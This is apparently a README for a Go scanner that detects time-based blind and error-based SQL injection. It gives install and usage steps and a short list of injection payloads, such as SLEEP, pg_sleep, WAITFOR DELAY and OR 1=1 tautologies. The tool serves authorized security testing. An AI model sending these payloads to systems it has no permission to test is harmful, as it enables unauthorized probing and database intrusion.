Time-based blind & error-based SQL injection scanner written in Go.
Injects payloads, measures response times, and inspects responses for database error signatures.

---

How it works

🕐 Time-Based Blind

1. Baseline → measures the target's normal response time
2. Inject → sends each payload to the marked injection point in the URL
3. Detect → if a response takes significantly longer than baseline, the endpoint is flagged as potentially vulnerable

🔴 Error-Based

1. Inject → sends each payload to the marked injection point in the URL
2. Inspect → scans the response body for known database error signatures (MySQL, PostgreSQL, MSSQL, Oracle, SQLite and more)
3. Detect → if a matching error string is found, the endpoint is flagged as potentially vulnerable

---

Install

git clone https://github.com/hexsh1dow/Sh1dowQLI
cd Sh1dowQLI
go build -o sh1dowqli main.go
./sh1dowqli

---

Usage

Use * to mark the injection point in your target URL:

Target URL:   http://target.com/page?id=*
Payload file: payloads.txt

On launch, select your scan mode:

[1] time-based blind SQL injection scan
[2] error-based SQL injection scan

---

Payload file

One payload per line — URL encoding is handled automatically.

Time-based payloads:

1 AND SLEEP(5)--
1 AND randomblob(500000000)--
' OR pg_sleep(5)--
1; WAITFOR DELAY '0:0:5'--

Error-based payloads:

'
''
`
')
"))
' OR '1'='1
' OR 1=1--
" OR "1"="1

---

💬 Community & Support

• 🐦 Twitter/X: @hexsh1dow
• 🐙 GitHub: hexsh1dow

Found a bug? Open an issue

---

⭐ Show Your Support

If this tool helped you:

• ⭐ Star this repository
• 💬 Share with others

---

📝 License

This project is licensed under the MIT License - see the LICENSE file for details.

---

Disclaimer

Warning

This tool is intended for authorized security testing only.
Do not use it against systems you do not own or have explicit written permission to test.
Misuse may be illegal.

---

Made by @hexsh1dow